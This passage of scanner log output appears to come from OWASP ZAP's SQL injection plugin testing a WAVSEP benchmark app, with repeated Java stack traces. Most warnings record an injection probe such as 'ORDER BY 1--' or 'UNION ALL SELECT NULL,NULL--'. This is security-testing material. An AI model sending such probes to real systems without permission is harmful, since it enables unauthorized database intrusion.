org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680400 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680401 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 1651-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ ORDER BY 1651-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680403 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680404 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680406 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680408 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680411 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680412 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680413 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680415 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680416 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680417 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680418 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at 